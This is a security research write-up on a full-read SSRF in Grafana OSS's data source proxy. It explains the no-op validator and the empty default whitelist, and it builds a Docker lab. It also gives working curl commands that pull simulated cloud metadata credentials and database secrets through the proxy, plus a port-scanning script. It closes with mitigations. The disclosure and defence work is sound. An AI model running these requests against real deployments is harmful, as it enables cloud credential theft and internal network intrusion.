# Grafana OSS - Full Read SSRF via Data Source Proxy
## Abstract
Grafana is one of the most popular open-source monitoring and observability platforms, used by thousands of organizations to visualize metrics, logs, and traces. During security research on the Grafana OSS codebase, I identified a full read Server-Side Request Forgery (SSRF) vulnerability/misconfiguration in the data source proxy. An authenticated user with data source creation permissions can configure a data source pointing to any internal URL, and the proxy returns the complete response body, making it trivial to steal cloud metadata credentials, read internal APIs, and map the internal network.
This is possible because of two compounding issues in Grafana OSS: the URL validator is a no-op that always returns `nil`, and the data source proxy whitelist is empty by default, which causes the whitelist check to be skipped entirely.
## Is This a Vulnerability or a Misconfiguration?
This is a fair question. The answer is: it's both.
Grafana OSS intentionally ships with a no-op URL validator. The Enterprise version has actual validation logic. The data source proxy whitelist exists as a configuration option (`data_source_proxy_whitelist`) but is empty by default, and the code is written so that an empty whitelist means allow everything. This is a design decision, not an accidental bug.
However, this creates a dangerous default: every Grafana OSS instance deployed in a cloud environment (AWS, GCP, Azure) with the default configuration is vulnerable to SSRF from any user that can create data sources. Most organizations deploying Grafana don't know that this whitelist exists or that it needs to be configured. The secure-by-default principle says that the default configuration should be safe, and this one isn't.
Regardless of how you classify it, the impact is real: full read access to internal network services from the Grafana server's network context.
## The Problem in Code
### Problem 1: No-op URL Validator (OSS)
The Grafana OSS build includes a URL validator that does literally nothing. Both the request validator and the URL validator always return `nil`:

```go
// pkg/services/validations/oss.go
type OSSDataSourceRequestValidator struct{}

func (*OSSDataSourceRequestValidator) Validate(string, *simplejson.Json, *http.Request) error {
	return nil // Always passes - zero validation
}

type OSSDataSourceRequestURLValidator struct{}

func (*OSSDataSourceRequestURLValidator) Validate(string) error {
	return nil // Always passes - zero URL validation
}
```
This is the entire file. There is no IP range check, no hostname check, no protocol check. The Grafana Enterprise build replaces this with actual validation logic, but the OSS version, which is what most people deploy, has nothing.
### Problem 2: Empty Whitelist = Allow Everything
The data source proxy has a whitelist check, but its logic is inverted for the default case:
```go
// pkg/api/pluginproxy/ds_proxy.go:402-411
func (proxy *DataSourceProxy) checkWhiteList() bool {
	if proxy.targetUrl.Host != "" && len(proxy.cfg.DataProxyWhiteList) > 0 {
		if _, exists := proxy.cfg.DataProxyWhiteList[proxy.targetUrl.Host]; !exists {
			proxy.ctx.JsonApiErr(403, "Data proxy hostname and ip are not included in whitelist", nil)
			return false
		}
	}
	return true // Empty whitelist = allow everything
}
```
The whitelist is only enforced when `len(proxy.cfg.DataProxyWhiteList) > 0`. When the whitelist is empty (the default), the entire check is skipped and the function returns `true` (allowed).
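The decision can be reduced to a few lines. Here is a standalone sketch (a simplified stand-in for the real method, which also emits the 403 response) that makes the empty-map short-circuit explicit:

```go
package main

import "fmt"

// checkWhiteList mirrors the decision logic above: a non-empty
// whitelist is enforced, an empty one skips the check entirely.
func checkWhiteList(host string, whitelist map[string]struct{}) bool {
	if host != "" && len(whitelist) > 0 {
		if _, exists := whitelist[host]; !exists {
			return false // would trigger the 403 in Grafana
		}
	}
	return true
}

func main() {
	empty := map[string]struct{}{}
	configured := map[string]struct{}{"prometheus.internal:9090": {}}

	// Default config: empty whitelist allows any host, metadata included.
	fmt.Println(checkWhiteList("169.254.169.254", empty)) // true

	// Configured whitelist: only listed hosts pass.
	fmt.Println(checkWhiteList("169.254.169.254", configured))        // false
	fmt.Println(checkWhiteList("prometheus.internal:9090", configured)) // true
}
```

Note how the guard condition couples "is a host present" with "is the whitelist non-empty", so the safe branch is unreachable in the default configuration.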
The default configuration in `conf/defaults.ini`:

```ini
# conf/defaults.ini:398-399
# data source proxy whitelist (ip_or_domain:port separated by spaces)
data_source_proxy_whitelist =
```
Empty. Out of the box, every Grafana OSS instance allows proxying to any host.
### Problem 3: URL Validation Only Checks Format
When creating a data source, the URL goes through `ValidateURL()`, but this function only checks that the URL is syntactically valid (has a protocol, parses correctly). It does not check whether the URL points to a private IP range or a cloud metadata endpoint:
```go
// pkg/api/datasource/validation.go:63
func ValidateURL(typeName, urlStr string) (*url.URL, error) {
	// Only checks: is URL empty? does it have a protocol? does it parse?
	// Does NOT check: is the host a private IP? is it a cloud metadata endpoint?
	if !reURL.MatchString(urlStr) {
		urlStr = "http://" + urlStr
	}
	u, err := url.Parse(urlStr)
	// ...
	return u, nil
}
```
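To make the gap concrete, here is a small self-contained sketch (not Grafana code; `hostIsSensitive` is an illustrative helper) showing that a cloud metadata URL sails through format-only parsing, while a basic address check would have flagged it:

```go
package main

import (
	"fmt"
	"net"
	"net/url"
)

// hostIsSensitive flags loopback, private, and link-local addresses --
// exactly the kind of check ValidateURL does not perform.
func hostIsSensitive(host string) bool {
	ip := net.ParseIP(host)
	if ip == nil {
		return false // hostname: deciding would require DNS resolution
	}
	return ip.IsLoopback() || ip.IsPrivate() || ip.IsLinkLocalUnicast()
}

func main() {
	// Syntactically valid, so format-only validation accepts it.
	u, err := url.Parse("http://169.254.169.254/latest/meta-data/")
	fmt.Println(err == nil) // true

	// A host-level check would reject it: 169.254.0.0/16 is link-local.
	fmt.Println(hostIsSensitive(u.Hostname())) // true
}
```

`net.IP.IsPrivate` (Go 1.17+) covers 10.0.0.0/8, 172.16.0.0/12, and 192.168.0.0/16; `IsLinkLocalUnicast` covers the 169.254.0.0/16 metadata range.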
### The Proxy: Full Reverse Proxy with Response Passthrough
The data source proxy is a full HTTP reverse proxy. It forwards the request and returns the complete response body to the caller:
```go
// pkg/api/pluginproxy/ds_proxy.go:91-162
func (proxy *DataSourceProxy) HandleRequest() {
	if err := proxy.validateRequest(); err != nil {
		proxy.ctx.JsonApiErr(403, err.Error(), nil)
		return
	}

	// Get transport (no IP validation here either)
	transport, err := proxy.dataSourcesService.GetHTTPTransport(...)

	// Create reverse proxy - forwards request to target and returns response
	reverseProxy := proxyutil.NewReverseProxy(
		proxyErrorLogger,
		proxy.director,
		proxyutil.WithTransport(transport),
		proxyutil.WithModifyResponse(modifyResponse),
	)

	// Serve - full response body is returned to the attacker
	reverseProxy.ServeHTTP(proxy.ctx.Resp, proxy.ctx.Req)
}
```
This is what makes this a full read SSRF, not a blind SSRF. The attacker gets the complete HTTP response from the internal service, including headers and body.
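The passthrough behavior is just standard `httputil.ReverseProxy` semantics, which the wrapper above builds on. A self-contained sketch with a stand-in backend (using `httptest`; none of these names come from Grafana) shows the proxy's caller receiving the backend's complete body:

```go
package main

import (
	"fmt"
	"io"
	"net/http"
	"net/http/httptest"
	"net/http/httputil"
	"net/url"
)

// fetchThroughProxy stands up a fake internal backend plus a reverse
// proxy in front of it, then returns what a client of the proxy sees.
func fetchThroughProxy() string {
	// Stand-in for an internal service the attacker cannot reach directly.
	backend := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		fmt.Fprint(w, `{"secret":"internal-data"}`)
	}))
	defer backend.Close()

	// A reverse proxy pointed at it - the role the data source proxy plays.
	target, _ := url.Parse(backend.URL)
	front := httptest.NewServer(httputil.NewSingleHostReverseProxy(target))
	defer front.Close()

	resp, err := http.Get(front.URL + "/")
	if err != nil {
		return err.Error()
	}
	defer resp.Body.Close()
	body, _ := io.ReadAll(resp.Body)
	return string(body)
}

func main() {
	// The backend response body reaches the caller unmodified.
	fmt.Println(fetchThroughProxy())
}
```

Nothing in `ReverseProxy` redacts or truncates the upstream response; whatever the internal service says, the external caller reads.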
## Prerequisites
- Grafana OSS (any version; the no-op validator has existed since the OSS/Enterprise split)
- Default configuration (`data_source_proxy_whitelist` not set, which is the default)
- Admin role (by default), or any user with the `datasources:create` and `datasources:query` RBAC permissions
- The Grafana server deployed in a network with reachable internal services (cloud VPC, Kubernetes cluster, Docker network, etc.)
Note on Grafana Enterprise: the Enterprise build has actual URL validators (`OSSDataSourceRequestURLValidator` is replaced with a real implementation). This issue is specific to Grafana OSS.
## Lab Setup
The following Docker Compose lab demonstrates the vulnerability with a simulated internal service containing sensitive data.
### 1. Create the project structure
```shell
mkdir grafana-ssrf-lab && cd grafana-ssrf-lab
```
### 2. Create internal_service.py
This simulates an internal service (cloud metadata endpoint, secret manager, internal API) that contains sensitive data and should only be accessible within the network:
```python
#!/usr/bin/env python3
"""Simulates an internal service with sensitive data (e.g., cloud metadata)"""
from http.server import HTTPServer, BaseHTTPRequestHandler
import json


class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header('Content-Type', 'application/json')
        self.end_headers()

        # Simulate different internal endpoints
        if self.path == '/latest/meta-data/iam/security-credentials/grafana-role':
            # Simulated AWS IMDSv1 response
            data = {
                'Code': 'Success',
                'Type': 'AWS-HMAC',
                'AccessKeyId': 'AKIAIOSFODNN7EXAMPLE',
                'SecretAccessKey': 'wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY',
                'Token': 'IQoJb3JpZ2luX2VjEBAaDmFwLXNvdXRoZWFzdC0xIkcwRQIhAJ...',
                'Expiration': '2026-03-25T00:00:00Z'
            }
        elif self.path == '/api/v1/secrets/database':
            # Simulated internal secret manager
            data = {
                'secret_name': 'production-database',
                'username': 'db_admin',
                'password': 'S3cureP@ssw0rd!2026',
                'host': 'prod-db.internal:5432',
                'database': 'customers'
            }
        else:
            data = {
                'service': 'INTERNAL-SECRET-SERVICE',
                'path': self.path,
                'message': 'THIS DATA SHOULD NOT BE ACCESSIBLE FROM OUTSIDE',
                'internal_ip': '10.0.1.50',
                'environment': 'production'
            }
        self.wfile.write(json.dumps(data, indent=2).encode())

    def do_POST(self):
        content_length = int(self.headers.get('Content-Length', 0))
        body = self.rfile.read(content_length)
        self.send_response(200)
        self.send_header('Content-Type', 'application/json')
        self.end_headers()
        print(f'[HIT] POST {self.path}', flush=True)
        print(f'[HIT] Body: {body.decode()[:500]}', flush=True)
        self.wfile.write(b'{"status": "ok"}')

    def log_message(self, format, *args):
        print(f'[INTERNAL-SERVICE] {format % args}', flush=True)


if __name__ == '__main__':
    print('Internal service listening on port 8080...', flush=True)
    HTTPServer(('0.0.0.0', 8080), Handler).serve_forever()
```
### 3. Create docker-compose.yml
```yaml
services:
  grafana:
    image: grafana/grafana-oss:latest
    container_name: grafana-lab
    ports:
      - "3000:3000"
    environment:
      - GF_SECURITY_ADMIN_USER=admin
      - GF_SECURITY_ADMIN_PASSWORD=admin
    networks:
      - lab-network
    depends_on:
      - internal-service

  internal-service:
    image: python:3.12-slim
    container_name: internal-service
    volumes:
      - ./internal_service.py:/app/server.py:ro
    command: python3 /app/server.py
    networks:
      - lab-network
    # No ports exposed - only accessible within the Docker network

networks:
  lab-network:
    driver: bridge
```
### 4. Start the lab
```shell
$ docker compose up -d
[+] Running 3/3
 ✔ Network grafana-ssrf-lab_lab-network  Created
 ✔ Container internal-service            Started
 ✔ Container grafana-lab                 Started
```
### 5. Verify the setup
```shell
# Grafana is up
$ curl -s http://localhost:3000/api/health | jq .
{
  "commit": "...",
  "database": "ok",
  "version": "12.4.1"
}

# Internal service is reachable FROM Grafana's network
$ docker exec grafana-lab curl -s http://internal-service:8080/
{
  "service": "INTERNAL-SECRET-SERVICE",
  "path": "/",
  "message": "THIS DATA SHOULD NOT BE ACCESSIBLE FROM OUTSIDE",
  ...
}

# But NOT reachable from the host machine
$ curl -s --max-time 2 http://internal-service:8080/ 2>&1
curl: (6) Could not resolve host: internal-service
```
## Exploitation
### Step 1: Create a data source pointing to the internal service
Register a new Prometheus data source with the URL set to the internal service. The data source type doesn't matter much; the proxy forwards any request regardless of type.
```shell
$ DS_RESPONSE=$(curl -s -X POST http://localhost:3000/api/datasources \
  -u admin:admin \
  -H "Content-Type: application/json" \
  -d '{
    "name": "SSRF-Target",
    "type": "prometheus",
    "url": "http://internal-service:8080",
    "access": "proxy",
    "isDefault": false
  }')

$ DS_ID=$(echo "$DS_RESPONSE" | jq -r '.datasource.id // .id')
$ DS_UID=$(echo "$DS_RESPONSE" | jq -r '.datasource.uid // .uid')
$ echo "Data Source ID: $DS_ID / UID: $DS_UID"
Data Source ID: 2 / UID: fe4k7z1234abc
```
Grafana accepts this without complaint. The no-op URL validator returns `nil`, and the empty whitelist allows everything.
### Step 2: Read internal service data via the proxy
Now use the data source proxy endpoint. The path after `/proxy/{id}/` is appended to the data source URL, and the full response body is returned:
```shell
# Read the default endpoint
$ curl -s -u admin:admin \
  "http://localhost:3000/api/datasources/proxy/$DS_ID/"
{
  "service": "INTERNAL-SECRET-SERVICE",
  "path": "/",
  "message": "THIS DATA SHOULD NOT BE ACCESSIBLE FROM OUTSIDE",
  "internal_ip": "10.0.1.50",
  "environment": "production"
}
```
The full response from the internal service is returned to us. We can hit any path on the internal service:
```shell
# Simulate AWS IMDSv1 credential theft
$ curl -s -u admin:admin \
  "http://localhost:3000/api/datasources/proxy/$DS_ID/latest/meta-data/iam/security-credentials/grafana-role"
{
  "Code": "Success",
  "Type": "AWS-HMAC",
  "AccessKeyId": "AKIAIOSFODNN7EXAMPLE",
  "SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
  "Token": "IQoJb3JpZ2luX2VjEBAaDmFwLXNvdXRoZWFzdC0xIkcwRQIhAJ...",
  "Expiration": "2026-03-25T00:00:00Z"
}

# Read internal secret manager
$ curl -s -u admin:admin \
  "http://localhost:3000/api/datasources/proxy/$DS_ID/api/v1/secrets/database"
{
  "secret_name": "production-database",
  "username": "db_admin",
  "password": "S3cureP@ssw0rd!2026",
  "host": "prod-db.internal:5432",
  "database": "customers"
}
```
### Step 3: Same attack via UID-based endpoint
```shell
# Works with UID too
$ curl -s -u admin:admin \
  "http://localhost:3000/api/datasources/proxy/uid/$DS_UID/api/v1/secrets/database"
{
  "secret_name": "production-database",
  "username": "db_admin",
  "password": "S3cureP@ssw0rd!2026",
  ...
}
```
### Step 4: Internal port scanning
Open ports return the service response (HTTP 200); closed ports return HTTP 502 from the Grafana proxy. This difference enables internal network mapping:
```bash
#!/bin/bash
# port_scan.sh - Scan internal ports via Grafana data source proxy SSRF
TARGET="internal-service"
GRAFANA="http://localhost:3000"
AUTH="admin:admin"

for PORT in 22 80 443 3306 5432 6379 8080 8443 9090 9200 27017; do
  # Create a data source for each port
  DS_ID=$(curl -s -X POST "$GRAFANA/api/datasources" \
    -u "$AUTH" \
    -H "Content-Type: application/json" \
    -d '{
      "name": "scan-'"$PORT"'",
      "type": "prometheus",
      "url": "http://'"$TARGET"':'"$PORT"'",
      "access": "proxy"
    }' | jq -r '.datasource.id // .id')

  # Probe through the proxy
  HTTP_CODE=$(curl -s -o /dev/null -w "%{http_code}" --max-time 3 \
    -u "$AUTH" \
    "$GRAFANA/api/datasources/proxy/$DS_ID/" 2>/dev/null)

  if [ "$HTTP_CODE" = "200" ]; then
    echo "Port $PORT: OPEN (HTTP $HTTP_CODE)"
  else
    echo "Port $PORT: closed (HTTP $HTTP_CODE)"
  fi

  # Cleanup
  curl -s -X DELETE "$GRAFANA/api/datasources/$DS_ID" -u "$AUTH" > /dev/null
done
```
```shell
$ bash port_scan.sh
Port 22: closed (HTTP 502)
Port 80: closed (HTTP 502)
Port 443: closed (HTTP 502)
Port 3306: closed (HTTP 502)
Port 5432: closed (HTTP 502)
Port 6379: closed (HTTP 502)
Port 8080: OPEN (HTTP 200)   <-- internal service found!
Port 8443: closed (HTTP 502)
Port 9090: closed (HTTP 502)
Port 9200: closed (HTTP 502)
Port 27017: closed (HTTP 502)
```
## Why This is Dangerous
Unlike blind SSRF where the attacker can only observe side-channel information (timing, error messages), this is a full read SSRF. The attacker receives the complete HTTP response from the target service:
| Aspect | Blind SSRF | This (Full Read SSRF) |
|---|---|---|
| Response visible | No | Yes - complete body + headers |
| Data exfiltration | Side-channels only | Direct - full response returned |
| Trigger | Often requires waiting | Instant, on-demand |
| HTTP methods | Usually limited | GET, POST, PUT, DELETE |
| Cloud credential theft | Difficult to extract | Trivial - just read the response |
## Real-World Impact
- **AWS/GCP/Azure credential theft:** Create a data source pointing to `http://169.254.169.254` (AWS IMDSv1) or `http://metadata.google.internal` (GCP). Read the full IAM credential JSON response, including `AccessKeyId`, `SecretAccessKey`, and the session `Token`. This leads to full cloud account compromise if the instance role has broad permissions.
- **Kubernetes secret access:** Point to `https://kubernetes.default.svc/api/v1/namespaces/default/secrets`. If the Grafana pod's service account has the permissions, you can read all secrets in the cluster.
- **Internal API data exfiltration:** Read responses from internal REST APIs, databases with HTTP interfaces (Elasticsearch, CouchDB, Consul), and other services that don't require authentication from within the trusted network.
- **Internal network mapping:** Differentiate open (HTTP 200) from closed (HTTP 502) ports to discover running services and the network topology.
## Affected Versions
- All Grafana OSS versions (the no-op validator has existed since the OSS/Enterprise split)
- Confirmed on Grafana OSS v12.4.1 and current main branch
- Grafana Enterprise is not affected (has actual URL validators)
## Mitigation
If you're running Grafana OSS, you can mitigate this by configuring the data source proxy whitelist in your `grafana.ini` / `custom.ini`:
```ini
[security]
# Only allow proxying to these specific hosts
data_source_proxy_whitelist = prometheus.internal:9090 elasticsearch.internal:9200
```
This forces the whitelist check in `checkWhiteList()` to actually evaluate the target host against the allowed list. Any data source URL not matching a whitelisted host will be rejected with HTTP 403.
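For reference, the space-separated ini value maps directly onto the host set the whitelist check consults. A minimal sketch of that parsing (a simplified stand-in for Grafana's actual settings loader, not its real code):

```go
package main

import (
	"fmt"
	"strings"
)

// parseWhitelist turns the space-separated data_source_proxy_whitelist
// value into a host:port lookup set, mirroring the map the check consults.
func parseWhitelist(value string) map[string]struct{} {
	set := make(map[string]struct{})
	for _, host := range strings.Fields(value) {
		set[host] = struct{}{}
	}
	return set
}

func main() {
	wl := parseWhitelist("prometheus.internal:9090 elasticsearch.internal:9200")
	_, allowed := wl["prometheus.internal:9090"]
	_, blocked := wl["internal-service:8080"]
	fmt.Println(allowed, blocked) // true false
}
```

Note that entries are `host:port` pairs, so a whitelisted hostname on a different port is still rejected.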
For a proper fix in the codebase, Grafana should:

- Implement actual URL validation in `OSSDataSourceRequestURLValidator.Validate()` instead of returning `nil`
- Add a `SafeDialer` to the data source proxy HTTP transport that blocks private IP ranges (127.0.0.0/8, 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16) and cloud metadata endpoints (169.254.169.254) at the TCP connection level:

```go
// Recommended: SafeDialer with IP validation in the transport
transport.DialContext = func(ctx context.Context, network, addr string) (net.Conn, error) {
	host, _, _ := net.SplitHostPort(addr)
	if ip := net.ParseIP(host); ip != nil {
		if ip.IsLoopback() || ip.IsPrivate() || ip.IsLinkLocalUnicast() {
			return nil, fmt.Errorf("blocked: request to private IP %s", ip)
		}
		if ip.Equal(net.ParseIP("169.254.169.254")) {
			return nil, fmt.Errorf("blocked: request to cloud metadata endpoint")
		}
	}
	return (&net.Dialer{Timeout: 30 * time.Second}).DialContext(ctx, network, addr)
}
```

- Invert the whitelist logic so that an empty whitelist denies all instead of allowing all, or require explicit configuration
- Add a warning in the Grafana UI when a data source URL resolves to a private IP range
## References
- Grafana - Data sources documentation
- Grafana - data_source_proxy_whitelist configuration
- OWASP - Server Side Request Forgery
- OWASP - SSRF Prevention Cheat Sheet
- CWE-918: Server-Side Request Forgery
- Grafana OSS GitHub Repository
- AWS - Instance metadata retrieval